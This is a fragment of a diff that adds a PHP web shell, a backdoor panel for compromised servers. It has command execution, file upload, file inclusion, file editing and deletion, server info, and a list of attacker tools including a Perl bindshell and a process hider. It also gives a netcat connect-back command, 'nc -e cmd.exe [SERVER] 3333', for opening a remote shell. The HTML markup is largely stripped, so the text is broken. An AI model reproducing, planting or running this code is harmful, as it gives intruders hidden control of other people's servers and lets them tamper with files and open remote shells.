"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", + "--- Misc ---"=>"4", + "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", + "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); + $names = array_flip($tools); + echo("Tools:"); + echo("
"); + echo("Output Directory
"); + echo("

"); + echo(""); + echo("
"); + echo("
"); +} + +function lookup(){ // Domain lookup function + style(); + global $servinf; + $script = "import urllib, urllib2, sys, re + req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) + site = re.findall('.+\) (.+)
', urllib2.urlopen(req).read()) + for i in xrange(0,len(site)): + print site[i]"; // My sexy python script + $handle = fopen('lookup.py', 'w'); + fwrite($handle, $script); + fclose($handle); + echo("

Domains

"); + echo("
+
+

+ Safe Mode ON'; +} else { + print 'Safe Mode OFF'; +} + +?> + 

!
+  + + + + + +
+

[ Server Info ]

+

+ Current Directory: +
+ Shell: +
+ Server Software:
+ Server Name:
+ Server Protocol:
+


+ + + + + + + + + + + + + + + + + + + + + + + + + +
+

[ Command Execute ]

 +

[ File Upload ]

+

+

+
+Insert your commands here:
+
+
+


+ +

+
+
+ Info: For a connect + back Shell, use: nc -e cmd.exe [SERVER] 3333
+ after local command: nc -v -l -p 3333 (Windows)


+

+


+
+Here you can upload some files.
+
+
+
+ 
+

+
+File already exist

"; + } + + else + { + copy($file,"$filename"); + if( file_exists($filename)) + { + echo "

File uploaded successful

"; + } + elseif(! file_exists($filename)) + { + echo "

File not found

"; + } + } +} +?> + +

+

+

[ Files & Directories ]

 +

[ File Inclusion ]

+ +

+
+

+'.$file.'
'; +} +closedir($folder); +?> +

 

 +


+ Include + something :)
+

+

+
+
+

+
+ +
+

[ File Editor ]

 +

[ Notices ]

+ +

Error or No contents in file"; + } + else + $status = "File does not exist!"; +} +else if($_POST["submit"] == "Delete") +{ + if(file_exists($filename)) + { + if(unlink($filename)) + $status = "File successfully deleted!"; + else + $status = "Could not delete file!"; + } + else + $status = "File does not exist!"; +} +else if($_POST["submit"] == "Save") +{ + $filecontents = stripslashes(html_entity_decode($_POST["contents"])); + + if(file_exists($filename)) + unlink($filename); + + $handle = fopen($filename, "w"); + + if(!$handle) + $status = "Could not open file for write access! "; + else + { + if(!fwrite($handle, $filecontents)) + $status = $status."Could not write to file! (Maybe you didn't enter any text?)"; + + fclose($handle); + } + + $filecontents = htmlentities($filecontents); +} +else +{ + $status = "No file loaded!"; +} +?> + + + + + + + + + + + + + +
+ + + + +
+
+ + + +
+
+ +
+ + + +
+

+

+


+
+  

+
+